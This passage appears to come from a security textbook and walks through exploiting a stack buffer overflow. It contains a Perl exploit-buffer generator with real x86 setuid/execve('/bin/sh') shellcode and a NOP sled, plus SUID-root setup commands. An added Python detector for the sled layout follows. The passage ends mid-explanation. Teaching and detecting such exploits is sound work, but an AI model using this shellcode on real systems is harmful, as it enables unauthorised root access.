Putting It All Together: Exploiting a Program
All the elements of our exploit buffer are in place: the filler, the new EIP the program will return to, the NOP sled, and our shellcode. It's time to try it out from the command line outside the debugger. Here is a Perl script that generates an exploit buffer using the previously discussed values. Note that the pack() function handles the little-endian conversion:
    #!/usr/bin/perl
    # File: exploit_buffer.pl

    my $shellcode =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    # Address inside the NOP sled; pack('V') below emits it as a 32-bit little-endian value.
    my $return = 0xbfff8f60;

    # Layout: 28 bytes of filler, the new saved EIP, a 1024-byte NOP sled, then the shellcode.
    print "A"x28 . pack('V',$return) . "\x90"x1024 . $shellcode;
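Seen from the other side, the same layout is what an argument-inspection check would look for. The following Python is an added, defensive example (not from the book): it scans one argv value for a long run of 0x90 bytes and decodes the four bytes just before it with struct's '<I', the inverse of Perl's pack('V'). The sample input is constructed here with a dummy payload in place of real shellcode; the 32-NOP threshold and the 0xbf000000 stack range are assumptions for classic 32-bit Linux.

```python
import re
import struct

# Constructed sample in the layout the text describes: 28 bytes of filler,
# a little-endian return address, a 1024-byte NOP sled, then a dummy payload.
SAMPLE_ARG = b"A" * 28 + struct.pack("<I", 0xBFFF8F60) + b"\x90" * 1024 + b"PAYLOAD"

# Assumed classic user-stack range on 32-bit Linux (0xbfxxxxxx).
STACK_LO, STACK_HI = 0xBF000000, 0xBFFFFFFF


def analyze_argument(arg: bytes, min_sled: int = 32):
    """Inspect one argv value for the filler/EIP/NOP-sled/payload layout.

    Returns None when no NOP sled of at least min_sled bytes is present.
    Otherwise returns a dict with the sled length, the 32-bit little-endian
    value immediately preceding the sled (the would-be saved EIP, decoded
    with '<I'), whether that value falls in the assumed stack range, and
    the number of bytes following the sled.
    """
    match = re.search(rb"\x90{%d,}" % min_sled, arg)
    if match is None:
        return None
    sled_start, sled_end = match.span()

    return_addr = None
    if sled_start >= 4:
        # The four bytes right before the sled are where pack('V') placed $return.
        return_addr = struct.unpack("<I", arg[sled_start - 4:sled_start])[0]

    return {
        "sled_len": sled_end - sled_start,
        "return_addr": return_addr,
        "return_in_stack_range": return_addr is not None
        and STACK_LO <= return_addr <= STACK_HI,
        "trailing_bytes": len(arg) - sled_end,
    }


if __name__ == "__main__":
    report = analyze_argument(SAMPLE_ARG)
    print(report)
    print(analyze_argument(b"an ordinary argument"))
```

For SAMPLE_ARG the decoded return address is 0xbfff8f60, the value the Perl script packed, and an ordinary string yields None.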
The chown and chmod commands are used to set up our example program as a set user ID (SUID) application. These commands cause the program to be executed at the root user's privilege level. This is done to demonstrate the effect of an exploited SUID root program in the wild.
    $ su
    Password:
    # chown root:root ./vuln
    # chmod +s ./vuln
    # exit
    $ ls -la vuln
    -rwsrwsr-x 1 root root 5817 Jan 24 05:50 vuln
Now, for the actual exploitation of the program; use the ` (backtick) character to execute the Perl script that generates our exploit buffer. This buffer becomes the first argument to our vulnerable program. As previously mentioned, the overflowed program overwrites the sEIP address to our new return value which should point into our NOP ...